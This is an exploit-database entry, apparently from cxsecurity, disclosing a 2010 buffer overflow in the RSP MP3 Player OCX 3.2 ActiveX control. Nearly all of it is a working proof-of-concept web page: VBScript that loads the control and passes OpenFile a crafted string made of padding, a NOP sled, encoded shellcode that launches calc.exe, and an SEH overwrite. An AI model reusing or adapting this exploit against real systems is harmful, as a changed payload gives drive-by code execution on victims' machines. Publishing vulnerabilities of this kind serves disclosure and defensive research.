RSP MP3 Player OCX 3.2 Active-X buffer overflow

2010.07.11
Credit: Blake
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

<html> <object classid='clsid:3C88113F-8CEC-48DC-A0E5-983EF9458687' id='target'></object> <script language='vbscript'> ' Exploit Title: RSP MP3 Player OCX 3.2 ActiveX Buffer Overflow ' Date: July 9, 2010 ' Author: Blake ' Software Link: http://download.cnet.com/RSP-MP3-Player-OCX/3000-2206_4-10860503.html?tag=mncol ' Version: 3.2 ' Tested on: Windows XP SP3 / IE7 in VirtualBox ' EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%48%49") & _ unescape("%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%68") & _ unescape("%58%50%30%42%31%42%41%6b%41%41%78%32%41%42%32%42") & _ unescape("%41%30%42%41%41%58%38%41%42%50%75%59%79%39%6c%4a") & _ unescape("%48%50%44%63%30%35%50%43%30%4c%4b%57%35%77%4c%4c") & _ unescape("%4b%51%6c%35%55%64%38%77%71%6a%4f%4c%4b%62%6f%45") & _ unescape("%48%4e%6b%31%4f%45%70%55%51%6a%4b%73%79%6e%6b%70") & _ unescape("%34%6c%4b%46%61%7a%4e%70%31%4b%70%4e%79%6e%4c%6c") & _ unescape("%44%49%50%52%54%67%77%5a%61%59%5a%34%4d%55%51%6f") & _ unescape("%32%4a%4b%79%64%37%4b%51%44%41%34%35%54%71%65%6d") & _ unescape("%35%4e%6b%53%6f%47%54%65%51%4a%4b%31%76%4e%6b%46") & _ unescape("%6c%30%4b%6e%6b%51%4f%75%4c%54%41%58%6b%4c%4b%77") & _ unescape("%6c%6e%6b%66%61%58%6b%6d%59%33%6c%46%44%46%64%6a") & _ unescape("%63%35%61%6b%70%71%74%6e%6b%63%70%54%70%6f%75%6f") & _ unescape("%30%54%38%56%6c%4c%4b%61%50%36%6c%4e%6b%34%30%35") & _ unescape("%4c%4c%6d%6e%6b%43%58%75%58%58%6b%54%49%4c%4b%4d") & _ unescape("%50%6c%70%43%30%57%70%55%50%6e%6b%32%48%35%6c%71") & _ unescape("%4f%67%41%6b%46%53%50%56%36%6b%39%48%78%4d%53%4f") & _ unescape("%30%71%6b%32%70%33%58%4c%30%4d%5a%56%64%43%6f%52") & _ unescape("%48%6a%38%4b%4e%4c%4a%66%6e%31%47%4b%4f%6b%57%61") & _ unescape("%73%70%61%30%6c%71%73%64%6e%70%65%73%48%72%45%35") & _ unescape("%50%68") buffer1 = string(221, "A") nops = string(40, unescape("%90")) ' nop sled near_jmp = unescape("%e9%5e%fe%ff%ff") ' jump back 418 next_seh = unescape("%eb%f9%90%90") ' jump back seh = unescape("%56%29%d1%72") ' 0x72D12956 [msacm32.drv] buffer2 = string(1000, "C") exploit = buffer1 + nops + shellcode + nops + near_jmp + next_seh + seh + buffer2 target.OpenFile exploit </script>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top